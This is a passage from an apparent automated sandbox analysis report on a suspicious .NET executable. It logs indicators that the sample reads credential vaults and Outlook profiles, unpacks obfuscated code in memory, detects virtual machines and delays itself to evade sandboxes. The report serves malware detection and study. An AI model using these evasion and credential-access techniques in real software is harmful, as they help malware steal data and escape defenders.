Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: z34PDnVzyEItkXaInw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: z34PDnVzyEItkXaInw.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.z34PDnVzyEItkXaInw.exe.256049c.8.raw.unpack, SQL.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, g0O6mAVKXhCqDfmWqt.cs .Net Code: CX6wlepQXpeF0UX7ODa System.Reflection.Assembly.Load(byte[])
Source: 0.2.z34PDnVzyEItkXaInw.exe.6f80000.12.raw.unpack, SQL.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_07003D1F push esp; ret 0_2_07003D20
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073EBFD2 push esp; iretd 0_2_073EBFD9
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073ED12C push FFFFFF8Bh; iretd 0_2_073ED12F
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073ED11F push eax; ret 0_2_073ED120
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073ED0A3 push FFFFFF8Bh; iretd 0_2_073ED0AB
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073ED09B push eax; ret 0_2_073ED09C
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073ED0E2 push FFFFFF8Bh; iretd 0_2_073ED0EA
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073ED0DA push eax; ret 0_2_073ED0DB
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_01480C3D push edi; ret 3_2_01480CC2
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_01480C95 push edi; retf 3_2_01480C3A
Source: z34PDnVzyEItkXaInw.exe Static PE information: section name: .text entropy: 7.780979825074887
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, cYtiZBJgXLkO35auuN.cs High entropy of concatenated method names: 'C3LeqrfV9k', 'bVaeg9qEr1', 'vC7epui8XJ', 'ge7eGpbty0', 'Wbve1jgYHU', 'LNfe78IZMf', 'EhqeZAKo5t', 'Y9FexfkmtY', 'Rg1eugTZm9', 'mhPetEMaFv'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, wlAAtxM9fb63NXI7lL.cs High entropy of concatenated method names: 'QHMMLJtlax', 'dqiMXUJlXK', 'FybM9w0RCI', 'uZtMCvus0o', 'PrfMJmOYPB', 'tPSMeZDk6h', 'irEM5qPwxF', 'NZdMW3ZQjl', 'WXMMmvZex3', 'iBGMT0vcuD'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, u9Oe8ezqRJwdijhWn0.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'REQj2yMtlp', 'GpajKpLaa1', 'CbYjUA9Q5W', 'siLjYv9u74', 'nWDjMSg70n', 'GXTjj1CEFv', 'DFOjAxEH9d'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, Yexvbtrr2xPO7n9lT7.cs High entropy of concatenated method names: 'vpXp0MpAn', 'gCUGhySXs', 'SR2701UOh', 'GLwZpilxA', 'GDjuSEfkB', 'ghqtUhl6Z', 'FeIWPY5HqeImqugmDg', 'hBr0SBvKC5yeDedTjg', 'Mf0MgZAcq', 'Iq2ATEI4U'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, cL4MUQFjmLYsJlYopV.cs High entropy of concatenated method names: 'y0fJEO8Sed', 'fB7JSIRfMU', 'AVZJbenjVN', 'ToString', 'wUGJhUKou7', 'X29JOMbYsF', 'gWJ2GH65oQOey25NjvX', 'fQpZkK6vQPsUT412brC'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, Vu7ncTtCFD0sjXamvP.cs High entropy of concatenated method names: 'k0QjQ4hP3o', 'LHSjcIeYYW', 'F2AjkPsCWA', 'paxjLdaydp', 'VHKjXOVHlb', 'XAkjCpQkHd', 'nmJjJGeIRy', 'EaCMOMKpBG', 'QReM44nKtD', 'aSDM07mY79'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, CEXb4LWeDPdrDeSEcG.cs High entropy of concatenated method names: 'cxcQePssDI', 'JbSQ5rJVOC', 'eq2QmnHifA', 'AIaQTmohvJ', 'DV0QKxjl0H', 'fi2QUdGxGQ', 'qaMR7FORKeMZdvyCPR', 'yIxCRLBebAseA1uKgq', 'G5NQQnQP4g', 'OAvQcPx0tY'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, g0O6mAVKXhCqDfmWqt.cs High entropy of concatenated method names: 'oY4cyHuHNu', 'PC5cLID1Ia', 'SUucXvSpNn', 'TDjc9ti55P', 'rPncCQjGpx', 'bXecJXDgdm', 'XEnce5cjIZ', 'cbfc59M6cC', 'tUdcWX78Jj', 'peOcmvm8s1'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, orK5l3eTD4M4iRaAuN.cs High entropy of concatenated method names: 'uM9Y4KGU3u', 'uFoYDDQjdJ', 'bJSMVdtHH0', 'BSqMQpyvnx', 'g7LYdQF9dr', 'bGdYPtnbVE', 'wWGYRWdLUk', 'FYuYlkByFv', 'XSbYB5dXDL', 'BqkYE8x07U'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, iqObE2fwstZoIGKRfd.cs High entropy of concatenated method names: 'ECKeL1bgSo', 'bMOe9yjwIl', 'jxZeJhxT8O', 'KS0JDQ5wvQ', 'jCiJzKK6u2', 'o1IeV2JS8c', 'L06eQHVRa0', 'E7KeF39ISL', 'sTLecVkVy5', 'o74ekDwdZN'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, I8aDohIKoftP7xwepJ.cs High entropy of concatenated method names: 'wQ4Xlrq0vE', 'QukXB03mgN', 'vT9XE9eSoJ', 'd4mXSlLO37', 'IBdXbJ2CWb', 'TocXhrDZMb', 'yAIXOJKPTW', 'ibnX4jPr6D', 'OeAX0mGIZc', 'ktpXDJjaLl'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, rlrY9Lq6lLelgmowto.cs High entropy of concatenated method names: 'QvNMsy69Z3', 'LGJMoGOsYh', 'MvSMHUDLCN', 'MlLMNvp17X', 'JhWMl6D4ks', 'HjMManSTiR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, dE8QSW7TdyqJP7qqk69.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hqOAlh9okM', 'liLABOZyur', 'XCMAEx1fo0', 'S4PASCgrmn', 'v9AAbWhKKo', 'xA2Ahb5XxC', 'LxmAOhw6n6'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, J0DkVLbPDXLfEEDC9O.cs High entropy of concatenated method names: 'Dispose', 'rilQ0iTsVF', 'RsrFo3anJ7', 'neq66J62m2', 'qmTQDK5BJy', 'UC0Qzgf4D0', 'ProcessDialogKey', 'YMFFVwqGmI', 'JvNFQDyBMI', 'wyTFFEGps0'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, moXCNNOY2BYrEanHOi.cs High entropy of concatenated method names: 'zfUJyIWtUG', 'yqAJXCDO5G', 'EZ1JCvn5Y8', 'xG4Je0g8FB', 'DgDJ5IAEj3', 'kKHCbhsxtl', 'SgHChipDQy', 'HO3COq419P', 'mTdC4vnTw1', 'pZnC0taKJf'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, Twb64T79wCiVG8k9hDU.cs High entropy of concatenated method names: 'CS8jqSuX9q', 'k4hjgdxL6o', 'THOjp6Lnnw', 'XAajGQFT5g', 'HxIj1QYLb9', 'RJHj74AVB9', 'AFOjZTb1ig', 'RVXjxnPpSN', 'JqZju0qFT1', 'jsmjthgafK'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, pGG49EBnx9JEmOKRxZ.cs High entropy of concatenated method names: 'TZO2xZgh8o', 'b5t2uJ4CEe', 'qN42sBoSLN', 'Qrn2oaffxm', 'b8L2NxF3qE', 'RXD2aoPQUj', 'JN92fx4aUP', 'Lhs2iShGHP', 'IaF2wpUMGa', 'nZX2dkZPOm'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, pwBXFPmX3uaAj0XiEQ.cs High entropy of concatenated method names: 'AsCC1gHfNd', 'vEhCZKIShu', 'Uf59HO3xdX', 'sHa9NZl4k4', 'POh9a4C8G1', 'aaw9nCBwIn', 'O8B9fb8C1d', 'wcl9itYihR', 'cqN9Im8hfZ', 'NLt9w8O0CQ'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, JpIWHBNgRRoySP6j81.cs High entropy of concatenated method names: 'Him9Gb4hJs', 'oPo97sP50J', 'x7D9xo5Bnm', 'RvM9uW9Y8t', 'ScQ9KYjZyQ', 'SOi9UcCFDO', 'rFM9YeHaC8', 'blg9MVfZdf', 'Aqk9jiT4Rv', 'iUZ9AARM6Q'
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 5040, type: MEMORYSTR
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Memory allocated: 860000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Memory allocated: 24B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Memory allocated: 2220000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Memory allocated: 1480000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Memory allocated: 3050000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Memory allocated: 2D80000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599426 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599202 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598651 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598543 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598404 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598296 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598077 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597968 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597857 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597748 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597640 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597531 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597421 Jump to behavior
